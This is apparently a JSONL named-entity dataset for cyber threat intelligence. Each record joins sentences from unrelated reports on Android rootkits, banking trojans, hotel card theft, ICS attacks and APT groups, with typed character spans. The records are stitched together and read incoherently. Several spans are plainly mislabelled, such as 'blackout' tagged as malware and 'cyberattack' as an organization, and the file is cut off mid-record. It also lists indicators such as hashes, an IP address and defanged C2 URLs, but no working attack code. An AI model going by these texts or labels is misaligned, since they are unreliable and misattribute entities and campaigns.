{"text": "Unlike other rooting malware , this Trojan not only installs its modules into the system , it also injects malicious code into the system runtime libraries . In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software . The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload . ( Forbes , Gizmodo ) \u2022 Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over \u2022 Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos \u2022 New Threat Actor Launches Cyber - attacks on Ukraine and Poland \u2022", "spans": [{"start": 188, "end": 202, "label": "System"}, {"start": 222, "end": 239, "label": "System"}, {"start": 270, "end": 273, "label": "System"}, {"start": 348, "end": 351, "label": "System"}, {"start": 370, "end": 380, "label": "System"}, {"start": 438, "end": 444, "label": "Organization"}, {"start": 447, "end": 454, "label": "Organization"}, {"start": 483, "end": 514, "label": "Vulnerability"}, {"start": 518, "end": 532, "label": "System"}, {"start": 535, "end": 547, "label": "System"}, {"start": 581, "end": 608, "label": "System"}, {"start": 641, "end": 652, "label": "Organization"}, {"start": 681, "end": 696, "label": "Organization"}]}
{"text": "Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . In the RevengeHotels campaign , the downloaded files are .NET binaries protected with the Yoda Obfuscator . Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation \u2022", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 36, "end": 60, "label": "Indicator"}, {"start": 68, "end": 71, "label": "Malware"}, {"start": 169, "end": 209, "label": "Malware"}, {"start": 219, "end": 232, "label": "Organization"}, {"start": 269, "end": 273, "label": "Indicator"}, {"start": 302, "end": 317, "label": "Malware"}, {"start": 345, "end": 356, "label": "System"}, {"start": 361, "end": 375, "label": "System"}]}
{"text": "The distribution of rooting malware through Google Play is not a new thing . To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA . After unpacking them , the code is recognizable as the commercial RAT RevengeRAT . Talos Takes Ep .", "spans": [{"start": 44, "end": 55, "label": "System"}, {"start": 80, "end": 107, "label": "Malware"}, {"start": 121, "end": 131, "label": "System"}, {"start": 143, "end": 149, "label": "System"}, {"start": 174, "end": 198, "label": "Malware"}, {"start": 201, "end": 239, "label": "Malware"}, {"start": 317, "end": 320, "label": "Malware"}, {"start": 321, "end": 331, "label": "Malware"}, {"start": 334, "end": 339, "label": "Organization"}]}
{"text": "For example , the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016 . Hackers used the remote access to detect servers of their interest in the internal network . An additional module written by the group called ScreenBooking is used to capture credit card data . # 147 : The dangers of \" Mercenary \" groups and the spyware they create Upcoming events where you can find Talos \u201c Most prevalent malware files \u201d is taking a break this week for maintenance .", "spans": [{"start": 18, "end": 30, "label": "Malware"}, {"start": 52, "end": 63, "label": "System"}, {"start": 246, "end": 259, "label": "Malware"}, {"start": 323, "end": 341, "label": "Organization"}, {"start": 405, "end": 410, "label": "Organization"}]}
{"text": "But Dvmap is very special rooting malware . In 2015 , the Metel gang began to target banks and financial institutions directly . It monitors whether the user is browsing the web page . On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 85, "end": 90, "label": "Organization"}, {"start": 95, "end": 117, "label": "Organization"}, {"start": 244, "end": 252, "label": "Malware"}]}
{"text": "It uses a variety of new techniques , but the most interesting thing is that it injects malicious code into the system libraries \u2013 libdmv.so or libandroid_runtime.so . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . In the initial versions , back in 2016 , the downloaded files from RevengeHotels campaigns were divided into two modules : a backdoor and a module to capture screenshots . Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": [{"start": 131, "end": 140, "label": "Indicator"}, {"start": 144, "end": 165, "label": "Indicator"}, {"start": 168, "end": 173, "label": "System"}, {"start": 179, "end": 193, "label": "System"}, {"start": 210, "end": 216, "label": "Organization"}, {"start": 367, "end": 380, "label": "Organization"}, {"start": 425, "end": 433, "label": "Malware"}, {"start": 472, "end": 491, "label": "Organization"}, {"start": 547, "end": 558, "label": "Organization"}]}
{"text": "This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime , and it has been downloaded from the Google Play Store more than 50,000 times . After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Recently we noticed that these modules had been merged into a single backdoor module able to collect data from clipboard and capture screenshots . Shortly thereafter , ESET \u00ae researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 27, "end": 34, "label": "System"}, {"start": 146, "end": 163, "label": "System"}, {"start": 620, "end": 638, "label": "Organization"}, {"start": 664, "end": 675, "label": "Malware"}]}
{"text": "Kaspersky Lab reported the Trojan to Google , and it has now been removed from the store . With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions . In this example , the webpage that the attacker is monitoring is booking.com ( more specifically , the page containing the card details ) . They have named it Industroyer \u2013 the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}, {"start": 283, "end": 294, "label": "Indicator"}, {"start": 377, "end": 388, "label": "Malware"}, {"start": 413, "end": 445, "label": "System"}]}
{"text": "To bypass Google Play Store security checks , the malware creators used a very interesting method : they uploaded a clean app to the store at the end of March , 2017 , and would then update it with a malicious version for short period of time . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America . The code is specifically looking for data in Portuguese and English , allowing the attackers to steal credit card data from web pages written in these languages . This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use \u2013 systems developed decades ago with almost no security measures .", "spans": [{"start": 10, "end": 27, "label": "System"}]}
{"text": "Usually they would upload a clean version back on Google Play the very same day . US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies . In the ProCC campaigns , the downloaded files are Delphi binaries . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 50, "end": 61, "label": "System"}, {"start": 185, "end": 203, "label": "Organization"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 256, "end": 262, "label": "System"}, {"start": 274, "end": 285, "label": "Organization"}]}
{"text": "They did this at least 5 times between 18 April and 15 May . LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 . The backdoor installed in the machine is more customized than that used by RevengeHotels : it \u2019s developed from scratch and is able to collect data from the clipboard and printer spooler , and capture screenshots . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 134, "end": 147, "label": "Organization"}, {"start": 192, "end": 200, "label": "Malware"}, {"start": 263, "end": 276, "label": "Organization"}]}
{"text": "All the malicious Dvmap apps had the same functionality . Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits . Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites , it \u2019s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 18, "end": 23, "label": "Malware"}, {"start": 80, "end": 97, "label": "System"}, {"start": 132, "end": 148, "label": "System"}, {"start": 253, "end": 265, "label": "System"}, {"start": 375, "end": 386, "label": "Organization"}]}
{"text": "They decrypt several archive files from the assets folder of the installation package , and launch an executable file from them with the name \u201c start. \u201d The interesting thing is that the Trojan supports even the 64-bit version of Android , which is very rare . COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia . According to the relevant underground forums and messaging groups , these criminals also infect front desk machines in order to capture credentials from the hotel administration software ; they can then steal credit card details from it too . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": [{"start": 230, "end": 237, "label": "System"}]}
{"text": "All encrypted archives can be divided into two groups : the first comprises Game321.res , Game322.res , Game323.res and Game642.res \u2013 and these are used in the initial phase of infection , while the second group : Game324.res and Game644.res , are used in the main phase . Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry . Some criminals also sell remote access to these systems , acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves . A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": [{"start": 76, "end": 87, "label": "Indicator"}, {"start": 90, "end": 101, "label": "Indicator"}, {"start": 104, "end": 115, "label": "Indicator"}, {"start": 120, "end": 131, "label": "Indicator"}, {"start": 214, "end": 225, "label": "Indicator"}, {"start": 230, "end": 241, "label": "Indicator"}, {"start": 412, "end": 418, "label": "Organization"}, {"start": 464, "end": 476, "label": "Organization"}, {"start": 652, "end": 666, "label": "Organization"}, {"start": 672, "end": 698, "label": "System"}, {"start": 717, "end": 742, "label": "System"}]}
{"text": "Initial phase During this phase , the Trojan tries to gain root rights on the device and to install some modules . Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Some Brazilian criminals tout credit card data extracted from a hotel \u2019s system as high quality and reliable because it was extracted from a trusted source , i.e. , a hotel administration system . Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": [{"start": 392, "end": 411, "label": "Organization"}]}
{"text": "All archives from this phase contain the same files except for one called \u201c common \u201d . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . The majority of the victims are associated with the hospitality sector . As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": [{"start": 87, "end": 94, "label": "Organization"}, {"start": 162, "end": 172, "label": "System"}]}
{"text": "This is a local root exploit pack , and the Trojan uses 4 different exploit pack files , 3 for 32-bit systems and 1 for 64-bit-systems . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . Based on the routines used , we estimate that this attack has a global reach . The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": [{"start": 168, "end": 177, "label": "Organization"}, {"start": 201, "end": 220, "label": "Organization"}, {"start": 223, "end": 240, "label": "Organization"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 296, "end": 317, "label": "Organization"}]}
{"text": "If these files successfully gain root rights , the Trojan will install several tools into the system . Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Based on data extracted from Bit.ly statistics , we can see that potential victims from many other countries have at least accessed the malicious link . On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": [{"start": 417, "end": 423, "label": "Indicator"}, {"start": 560, "end": 567, "label": "Organization"}, {"start": 598, "end": 626, "label": "Vulnerability"}]}
{"text": "It will also install the malicious app \u201c com.qualcmm.timeservices. \u201d These archives contain the file \u201c .root.sh \u201d which has some comments in Chinese : Main phase In this phase , the Trojan launches the \u201c start \u201d file from Game324.res or Game644.res . FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops . This data suggests that the number of countries with potential victims is higher than our telemetry has registered . We called this new malware ?", "spans": [{"start": 41, "end": 66, "label": "Indicator"}, {"start": 103, "end": 111, "label": "Indicator"}, {"start": 222, "end": 233, "label": "Indicator"}, {"start": 237, "end": 248, "label": "Indicator"}, {"start": 251, "end": 261, "label": "System"}, {"start": 361, "end": 378, "label": "Organization"}, {"start": 591, "end": 598, "label": "Malware"}]}
{"text": "It will check the version of Android installed and decide which library should be patched . This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . RevengeHotels is a campaign that has been active since at least 2015 , revealing different groups using traditional RAT malware to infect businesses in the hospitality sector . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? Divine Comedy .", "spans": [{"start": 29, "end": 36, "label": "System"}, {"start": 172, "end": 185, "label": "System"}, {"start": 249, "end": 262, "label": "Organization"}, {"start": 365, "end": 368, "label": "Malware"}, {"start": 426, "end": 433, "label": "Malware"}, {"start": 460, "end": 464, "label": "Malware"}, {"start": 538, "end": 553, "label": "Organization"}, {"start": 560, "end": 573, "label": "Organization"}]}
{"text": "For Android 4.4.4 and older , the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from libdvm.so , and for Android 5 and newer it will patch method nativeForkAndSpecialize from libandroid_runtime.so . Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . While there is a marked interest in Brazilian victims , our telemetry shows that their reach has extended to other countries in Latin America and beyond . Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": [{"start": 4, "end": 17, "label": "System"}, {"start": 100, "end": 109, "label": "Indicator"}, {"start": 120, "end": 127, "label": "System"}, {"start": 190, "end": 211, "label": "Indicator"}, {"start": 214, "end": 228, "label": "Organization"}, {"start": 622, "end": 678, "label": "Indicator"}, {"start": 681, "end": 696, "label": "Vulnerability"}]}
{"text": "Both of these libraries are runtime libraries related to Dalvik and ART runtime environments . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The use of spear-phishing emails , malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign . Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": [{"start": 57, "end": 63, "label": "System"}, {"start": 68, "end": 71, "label": "System"}, {"start": 95, "end": 117, "label": "System"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 171, "end": 179, "label": "Organization"}, {"start": 182, "end": 191, "label": "Organization"}, {"start": 194, "end": 198, "label": "Organization"}, {"start": 205, "end": 213, "label": "Organization"}, {"start": 275, "end": 278, "label": "Malware"}, {"start": 407, "end": 417, "label": "Organization"}, {"start": 518, "end": 538, "label": "Organization"}]}
{"text": "Before patching , the Trojan will backup the original library with a name bak_ { original name } . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . Other threat actors may also be part of this wave of attacks , though there is no confirmation at the current time . For the CrySyS Lab analysis , please read [ here ] .", "spans": [{"start": 131, "end": 141, "label": "System"}, {"start": 168, "end": 180, "label": "System"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 414, "end": 424, "label": "Organization"}]}
{"text": "During patching , the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip . It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . If you want to be a savvy and safe traveler , it \u2019s highly recommended to use a virtual payment card for reservations made via OTAs , as these cards normally expire after one charge . The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": [{"start": 115, "end": 129, "label": "Indicator"}, {"start": 147, "end": 161, "label": "Organization"}, {"start": 411, "end": 436, "label": "Organization"}, {"start": 588, "end": 592, "label": "System"}, {"start": 649, "end": 667, "label": "Organization"}]}
{"text": "This could be very dangerous and cause some devices to crash following the overwrite . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . While paying for your reservation or checking out at a hotel , it \u2019s a good idea to use a virtual wallet such as Apple Pay , Google Pay , etc . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": [{"start": 192, "end": 211, "label": "Organization"}, {"start": 220, "end": 241, "label": "Organization"}, {"start": 357, "end": 366, "label": "System"}, {"start": 369, "end": 379, "label": "System"}, {"start": 435, "end": 484, "label": "Organization"}]}
{"text": "Then the Trojan will put the patched library back into the system directory . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product . RevengeHotels : 74440d5d0e6ae9b9a03d06dd61718f66 . The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": [{"start": 119, "end": 123, "label": "System"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 236, "end": 249, "label": "Organization"}, {"start": 252, "end": 284, "label": "Indicator"}]}
{"text": "After that , the Trojan will replace the original /system/bin/ip with a malicious one from the archive ( Game324.res or Game644.res ) . VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others . RevengeHotels : e675bdf6557350a02f15c14f386fcc47 . These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": [{"start": 50, "end": 64, "label": "Indicator"}, {"start": 105, "end": 116, "label": "Indicator"}, {"start": 120, "end": 131, "label": "Indicator"}, {"start": 136, "end": 140, "label": "System"}, {"start": 271, "end": 284, "label": "Organization"}, {"start": 287, "end": 319, "label": "Indicator"}, {"start": 328, "end": 347, "label": "Malware"}, {"start": 384, "end": 419, "label": "System"}]}
{"text": "In doing so , the Trojan can be sure that its malicious module will be executed with system rights . Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy . RevengeHotels : df632e25c32e8f8ad75ed3c50dd1cd47 . Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": [{"start": 112, "end": 123, "label": "Organization"}, {"start": 197, "end": 204, "label": "System"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 255, "label": "Indicator"}]}
{"text": "But the malicious ip file does not contain any methods from the original ip file . On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage . RevengeHotels : a089efd7dd9180f9b726594bb6cf81ae . This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": [{"start": 103, "end": 117, "label": "Organization"}, {"start": 247, "end": 260, "label": "Organization"}, {"start": 263, "end": 295, "label": "Indicator"}, {"start": 298, "end": 390, "label": "Malware"}]}
{"text": "This means that all apps that were using this file will lose some functionality or even start crashing . Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . RevengeHotels : 81701c891a1766c51c74bcfaf285854b . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": [{"start": 105, "end": 110, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 396, "end": 399, "label": "System"}, {"start": 478, "end": 491, "label": "Organization"}, {"start": 494, "end": 526, "label": "Indicator"}]}
{"text": "Malicious module \u201c ip \u201d This file will be executed by the patched system library . Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . APT1 . If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": [{"start": 83, "end": 88, "label": "Organization"}, {"start": 356, "end": 360, "label": "Organization"}]}
{"text": "It can turn off \u201c VerifyApps \u201d and enable the installation of apps from 3rd party stores by changing system settings . That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date . Since 2004 , Mandiant has investigated computer security breaches at hundreds of organizations around the world.The majority of these security breaches are attributed to advanced threat actors referred to as the \u201c Advanced Persistent Threat \u201d ( APT ) . These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": [{"start": 157, "end": 170, "label": "Organization"}, {"start": 171, "end": 182, "label": "Organization"}, {"start": 318, "end": 326, "label": "Organization"}]}
{"text": "Furthermore , it can grant the \u201c com.qualcmm.timeservices \u201d app Device Administrator rights without any interaction with the user , just by running commands . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates . We first published details about the APT in our January 2010 M-Trends report . These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": [{"start": 33, "end": 57, "label": "Indicator"}, {"start": 385, "end": 394, "label": "Organization"}, {"start": 399, "end": 418, "label": "Organization"}, {"start": 617, "end": 625, "label": "Organization"}]}
{"text": "It is a very unusual way to get Device Administrator rights . PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage . As we stated in there port , our position was that \u201c The Chinese government may authorize this activity , but there \u2019s no way to determine the extent of its involvement. \u201d Now , three years later , we have the evidence required to change our assessment . \u2022 Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar \u2013 if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": [{"start": 625, "end": 646, "label": "Organization"}, {"start": 718, "end": 725, "label": "Organization"}, {"start": 773, "end": 780, "label": "Malware"}, {"start": 789, "end": 795, "label": "Organization"}]}
{"text": "Malicious app com.qualcmm.timeservices As I mentioned before , in the \u201c initial phase \u201d , the Trojan will install the \u201c com.qualcmm.timeservices \u201d app . This APT group usually carries out target attacks against government agencies to steal sensitive information . The details we have analyzed during hundreds of investigations convince us that the groups conducting these activities are based primarily in China and that the Chinese Government is aware of them . This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": [{"start": 14, "end": 38, "label": "Indicator"}, {"start": 120, "end": 144, "label": "Indicator"}, {"start": 211, "end": 230, "label": "Organization"}, {"start": 463, "end": 599, "label": "Malware"}]}
{"text": "Its main purpose is to download archives and execute the \u201c start \u201d binary from them . In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks . Mandiant continues to track dozens of APT groups around the world ; however , this report is focused on the most prolific of these groups . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": [{"start": 275, "end": 287, "label": "System"}, {"start": 312, "end": 320, "label": "Organization"}, {"start": 461, "end": 476, "label": "Organization"}, {"start": 489, "end": 491, "label": "System"}, {"start": 506, "end": 562, "label": "Indicator"}, {"start": 567, "end": 624, "label": "Indicator"}]}
{"text": "During the investigation , this app was able to successfully connect to the command and control server , but it received no commands . We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware . We refer to this group as \u201c APT1 \u201d and it is one of more than 20 APT groups with origins inChina . Once they are downloaded to the machine , they can fetch a larger backdoor which carries out the cyberespionage activities , through functions such as copy file , move file , remove file , make directory , kill process and of course , download and execute new malware and lateral movement tools .", "spans": [{"start": 154, "end": 163, "label": "Organization"}, {"start": 284, "end": 299, "label": "System"}, {"start": 330, "end": 334, "label": "Organization"}, {"start": 494, "end": 523, "label": "Organization"}]}
{"text": "So I don \u2019 t know what kind of files will be executed , but they could be malicious or advertising files . In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities . APT1 is a single organization of operators that has conducted a cyber espionage campaign against a broad range of victims since at least 2006 . The final stage backdoor connects to two servers , one in Panama and one in Turkey to receive the instructions from the attackers .", "spans": [{"start": 172, "end": 179, "label": "System"}, {"start": 200, "end": 219, "label": "Organization"}, {"start": 222, "end": 226, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}]}
{"text": "Conclusions This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques , including patching system libraries . We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 . From our observations , it is one of the most prolific cyber espionage groups in terms of the sheer quantity of information stolen . The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : \u2022 By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": [{"start": 52, "end": 69, "label": "System"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 286, "end": 293, "label": "System"}, {"start": 495, "end": 504, "label": "Organization"}, {"start": 505, "end": 621, "label": "Indicator"}, {"start": 653, "end": 672, "label": "System"}, {"start": 675, "end": 725, "label": "Indicator"}]}
{"text": "It installs malicious modules with different functionality into the system . From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon . The scale and impact of APT1 \u2019s operations compelled us to write this report . Together with our partner CrySyS Lab , we \u2019ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": [{"start": 250, "end": 254, "label": "Organization"}, {"start": 331, "end": 341, "label": "Organization"}, {"start": 418, "end": 426, "label": "Malware"}]}
{"text": "It looks like its main purpose is to get into the system and execute downloaded files with root rights . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen . The activity we have directly observed likely represents only a small fraction of the cyber espionage that APT1 has conducted . These new infection vectors rely on Java and IE vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 105, "end": 118, "label": "Organization"}, {"start": 139, "end": 153, "label": "System"}, {"start": 291, "end": 295, "label": "Organization"}, {"start": 348, "end": 375, "label": "Vulnerability"}, {"start": 386, "end": 402, "label": "Organization"}]}
{"text": "But I never received such files from their command and control server . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) . Though our visibility of APT1 \u2019s activities is incomplete , we have analyzed the group \u2019s intrusions against nearly 150 victims over seven years . While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": [{"start": 72, "end": 90, "label": "Organization"}, {"start": 174, "end": 185, "label": "Organization"}, {"start": 188, "end": 194, "label": "Organization"}, {"start": 202, "end": 217, "label": "System"}, {"start": 258, "end": 273, "label": "System"}, {"start": 303, "end": 307, "label": "Organization"}, {"start": 453, "end": 464, "label": "System"}, {"start": 468, "end": 476, "label": "Malware"}, {"start": 479, "end": 621, "label": "Indicator"}]}
{"text": "These malicious modules report to the attackers about every step they are going to make . El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here . From our unique vantage point responding to victims , we tracked APT1 back to four large networks in Shanghai , two of which are allocated directly to the Pudong New Area . The page hxxp://[c2_hostname]/groups / business - principles.html is used as an starting point for the attack .", "spans": [{"start": 172, "end": 181, "label": "Organization"}, {"start": 254, "end": 258, "label": "Organization"}, {"start": 362, "end": 471, "label": "Indicator"}]}
{"text": "So I think that the authors are still testing this malware , because they use some techniques which can break the infected devices . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 . We uncovered a substantial amount of APT1 \u2019s attack infrastructure , command and control , and modus operandi ( tools , tactics , and procedures ) . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": [{"start": 284, "end": 288, "label": "Organization"}, {"start": 396, "end": 484, "label": "Malware"}, {"start": 487, "end": 551, "label": "Indicator"}, {"start": 556, "end": 603, "label": "Malware"}, {"start": 606, "end": 648, "label": "Indicator"}]}
{"text": "But they already have a lot of infected users on whom to test their methods . All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . In an effort to underscore there are actual individuals behind the keyboard , Mandiant is revealing three personas we have attributed to APT1 . The second webpage , \u201c sidebar.html \u201d contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": [{"start": 352, "end": 360, "label": "Organization"}, {"start": 411, "end": 415, "label": "Organization"}, {"start": 441, "end": 473, "label": "Indicator"}, {"start": 476, "end": 538, "label": "Malware"}]}
{"text": "I hope that by uncovering this malware at such an early stage , we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods . In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor . These operators , like soldiers , may merely be following orders given to them by others . Its code identifies the victim \u2019s browser and then serves one of two exploits .", "spans": [{"start": 198, "end": 205, "label": "System"}]}
{"text": "MD5 43680D1914F28E14C90436E1D42984E2 20D4B9EB9377C499917C4D69BF4CCEBE First widely distributed Android bootkit Malware infects more than 350,000 Devices January 29 , 2014 In the last quarter of 2013 , sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China \u2019s cyber threat actors . It also sends collected browser data to another script by sending a POST request to \u201c hxxp://[c2_hostname]/groups / count / write.php \u201d .", "spans": [{"start": 4, "end": 36, "label": "Indicator"}, {"start": 37, "end": 69, "label": "Indicator"}, {"start": 95, "end": 102, "label": "System"}, {"start": 227, "end": 234, "label": "System"}, {"start": 303, "end": 308, "label": "System"}, {"start": 383, "end": 404, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 418, "end": 435, "label": "Organization"}, {"start": 438, "end": 456, "label": "Organization"}, {"start": 461, "end": 466, "label": "Organization"}, {"start": 471, "end": 480, "label": "Organization"}, {"start": 487, "end": 510, "label": "Organization"}, {"start": 554, "end": 558, "label": "Organization"}, {"start": 741, "end": 788, "label": 